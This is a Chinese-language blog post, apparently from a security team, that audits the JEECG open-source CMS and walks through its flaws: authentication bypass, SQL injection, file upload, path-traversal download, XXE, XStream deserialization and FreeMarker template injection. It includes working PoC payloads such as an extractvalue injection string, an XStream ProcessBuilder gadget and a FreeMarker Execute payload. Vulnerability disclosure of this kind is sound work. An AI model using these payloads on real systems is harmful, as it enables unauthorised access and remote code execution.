记一次开源cms的Java代审

文章首发于Tops安全团队微信公众号：记一次开源cms的Java代审，欢迎关注！

环境搭建：

---

JEECG（J2EE Code Generation）是一款基于代码生成器的智能开发平台。引领新的开发模式(Online Coding->代码生成器->手工MERGE智能开发)，可以帮助解决Java项目80%的重复工作，让开发更多关注业务逻辑。

• 项目地址：https://gitee.com/jeecg/jeecg
• 环境搭建：http://idoc.jeecg.com/1275933
• 运行环境：Windows10 + Mysql5.7.26 + eclipse2022-09 + Tomcat7 + Jdk1.7
• 系统架构：SpringMVC + Hibernate + Minidao(类Mybatis) + Easyui(UI库)+ Jquery + Boostrap + Ehcache + Redis + Ztree

系统登录页面展示：

0x00 权限验证绕过——AuthInterceptor：

---

拦截器文件路径：org/jeecgframework/core/interceptors/AuthInterceptor.java

可以使用/api/../绕过 AuthInterceptor的认证，无需登录：

0x01 SQL注入：

---

文件路径：org/jeecgframework/web/cgform/controller/autolist/CgAutoListController.java，查看相关代码：

用户输入的动态参数field、sort和order未经过滤就传入到querySingle()方法中，然后实例化一个StringBuilder对象，通过成员方法append()拼接sql语句，然后调用findForJdbcParam执行SQL

POC：order=desc&page=1&rows=10&sort=extractvalue%281%2Cconcat%28char%28126%29%2C@@version%29%29，漏洞证明：

0x02 任意文件上传：

---

从控制层可以发现多处任意文件上传，这里举一例：

文件路径：com/jeecg/demo/controller/JeecgFormDemoController.java，查看相关代码：

最后调用org/jeecgframework/core/common/dao/impl/CommonDao.java的uploadFile()方法，通过利用spring中的FileCopyUtils.copy()复制文件

漏洞证明：

0x03 任意文件下载/读取：

---

文件路径：com/jeecg/demo/controller/JeecgFormDemoController.java，查看相关代码：

获取用户输入的请求参数dbpath、filename，filename为自定义下载的文件名，dbpath直接与硬编码的本地路径进行拼接作为请求下载的文件路径，打开文件对象并创建文件输入流，后得到响应对象的输出流，造成了任意文件下载/读取漏洞

POC：http://192.168.0.102:8080/jeecg/jeecgFormDemoController/filedown.do?filename=123&filepath=../ceshi.txt

漏洞证明：

0x04 XML外部实体注入：

---

文件路径：org/jeecgframework/core/common/dao/impl/CommonDao.java，查看相关代码：

使用了第三方组件SAXReader，默认的解析方法会出现XXE 漏洞，接着查找相应控制层的代码，是否调用了该方法

漏洞证明：

第三方组件漏洞：

---

0x01 XStream反序列化漏洞：

---

XStream版本为1.4.6，文件路径：org/jeecgframework/web/cgform/controller/build/CgformSqlController.java

若目录不存在，会在upload文件夹下创建目录，然后将上传的文件通过unzip()方法进行解压，获取到该目录的第一个文件利用xStream.fromXML进行解析

POC：

<sorted-set>
    <string>foo</string>
    <contact class='dynamic-proxy'>
        <interface>java.lang.Comparable</interface>
        <handler class='java.beans.EventHandler'>
            <target class='java.lang.ProcessBuilder'>
                <command>
                    <string>calc</string>
                </command>
            </target>
            <action>start</action>
        </handler>
    </contact>
</sorted-set>

漏洞证明：

0x02 FreeMarker 模板注入：

---

发现pom.xml中引入了FreeMarker模板引擎，大概率是存在模板注入的，全局搜索StringTemplateLoader#putTemplate和Template#process

登录系统，发现在“消息中间件”——“消息模板”处存在模板注入，POC：
<#assign value="freemarker.template.utility.Execute"?new()>${value("calc.exe")}

点击“推送测试”即可触发漏洞：

根据请求包，可知相关文件路径：org/jeecgframework/web/system/sms/controller/TSSmsTemplateController.java，查看相关代码：

由于是点击推送后才触发，根据逻辑直接跟进到sendMessage()方法：

该方法首先根据请求中传入的templateCode参数进行SQL查询，使用封装返回结果实体类，获取到模板内容并传参给getTempletContent方法

从该方法中可以知道是利用freemarker引擎进行内容解析，最后调用template.process()触发漏洞